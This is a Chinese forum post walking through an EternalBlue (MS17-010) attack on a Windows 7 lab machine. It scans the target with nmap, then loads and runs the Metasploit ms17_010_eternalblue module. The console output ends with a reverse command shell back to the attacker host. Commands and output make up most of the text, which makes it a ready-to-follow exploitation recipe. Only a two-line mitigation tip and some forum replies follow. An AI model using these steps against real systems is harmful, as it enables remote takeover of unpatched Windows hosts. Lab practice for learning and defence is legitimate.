kali系统利用ms17_010(永恒之蓝)漏洞渗透攻击windows
测试环境:渗透机:kali 2.0 192.168.1.109靶机:win 7 64位 192.168.1.107利用的漏洞:ms17_010需要用到的工具nmapMetasploit渗透过程:扫描目标机器# nmap -sV 192.168.1.107Starting Nmap 7.60 ( https://nmap.org ) at 2017-12-12 21:38 CST
Nmap scan report for 192.168.1.107
Host is up (0.00030s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
135/tcpopenmsrpc Microsoft Windows RPC
139/tcpopennetbios-ssnMicrosoft Windows netbios-ssn
445/tcpopenmicrosoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5357/tcp openhttp Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
MAC Address: 00:0C:29:19:6E:B7 (VMware)
Service Info: Host: HUGO-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.45 seconds
可以看到目标机器135/139/445端口都是开启状态启动Metasploit控制台Bash
# msfconsole
######## #
################# #
###################### #
######################### #
############################
##############################
###############################
###############################
##############################
# ######## #
## ### #### ##
### ###
#### ###
#### ########## ####
####################### ####
#################### ####
######################
############ ##
######## ###
######### #####
############ ######
######## #########
##### ########
### #########
###### ############
#######################
# # #### # ##
########################
## ## ## ##
https://metasploit.com
=[ metasploit v4.16.20-dev ]
+ -- --=[ 1705 exploits - 970 auxiliary - 299 post ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
使用ms17_010漏洞Bash
msf > use exploit/windows/smb/ms17_010_eternalblue
查看漏洞配置 Bash
msf exploit(ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current SettingRequiredDescription
---- ----------------------------------
GroomAllocations 12 yes Initial number of times to groom the kernel pool.
GroomDelta 5 yes The amount to increase the groom count by per try.
MaxExploitAttempts3 yes The number of times to retry the exploit.
ProcessName spoolsv.exe yes Process to inject payload into.
RHOST yes The target address
RPORT 445 yes The target port (TCP)
SMBDomain . no (Optional) The Windows domain to use for authentication
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VerifyArch true yes Check if remote architecture matches exploit Target.
VerifyTarget true yes Check if remote OS matches exploit Target.
Exploit target:
IdName
------
0 Windows 7 and Server 2008 R2 (x64) All Service Packs
设置渗透攻击目标IP地址Bash
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.107#rhost=目标IP启动渗透攻击Bash
msf exploit(ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.109:4444
[*] 192.168.1.107:445 - Connecting to target for exploitation.
[+] 192.168.1.107:445 - Connection established for exploitation.
[+] 192.168.1.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.1.107:445 - CORE raw buffer dump (27 bytes)
[*] 192.168.1.107:445 - 0x0000000057 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73Windows 7 Profes
[*] 192.168.1.107:445 - 0x0000001073 69 6f 6e 61 6c 20 37 36 30 30 sional 7600
[+] 192.168.1.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.1.107:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.1.107:445 - Sending all but last fragment of exploit packet
[*] 192.168.1.107:445 - Starting non-paged pool grooming
[+] 192.168.1.107:445 - Sending SMBv2 buffers
[+] 192.168.1.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.1.107:445 - Sending final SMBv2 buffers.
[*] 192.168.1.107:445 - Sending last fragment of exploit packet!
[*] 192.168.1.107:445 - Receiving response from exploit packet
[+] 192.168.1.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.1.107:445 - Sending egg to corrupted connection.
[*] 192.168.1.107:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (192.168.1.109:4444 -> 192.168.1.107:49170) at 2017-12-12 21:42:36 +0800
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.1.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Microsoft Windows
Copyright (c) 2009 Microsoft Corporation.All rights reserved.
C:\Windows\system32>
从输出的信息中,可以看到成功的从远程系统上拿到了一个Windows命令行的Shell。渗透攻击成功!!!输入ipconfig测试返回Bash
C:\Windows\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix. :
Link-local IPv6 Address . . . . . : fe80::e9ef:ad1a:c60a:c71%11
IPv4 Address. . . . . . . . . . . : 192.168.1.107
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1
Tunnel adapter isatap.{5C886759-C1E2-4CBE-9EB3-F24D1E1A4AD0}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix. :
ctrl+c可以断开
C:\Windows\system32>^C
Abort session 3? y
防范措施:1.开启防火墙并定期更新漏洞补丁2.如无必要,关闭135/139/445高危端口
6666666666666666666666666666666666666666666666666666 对win10没用 好好好好好好好好好好好好好好好好好顶
页:
[1]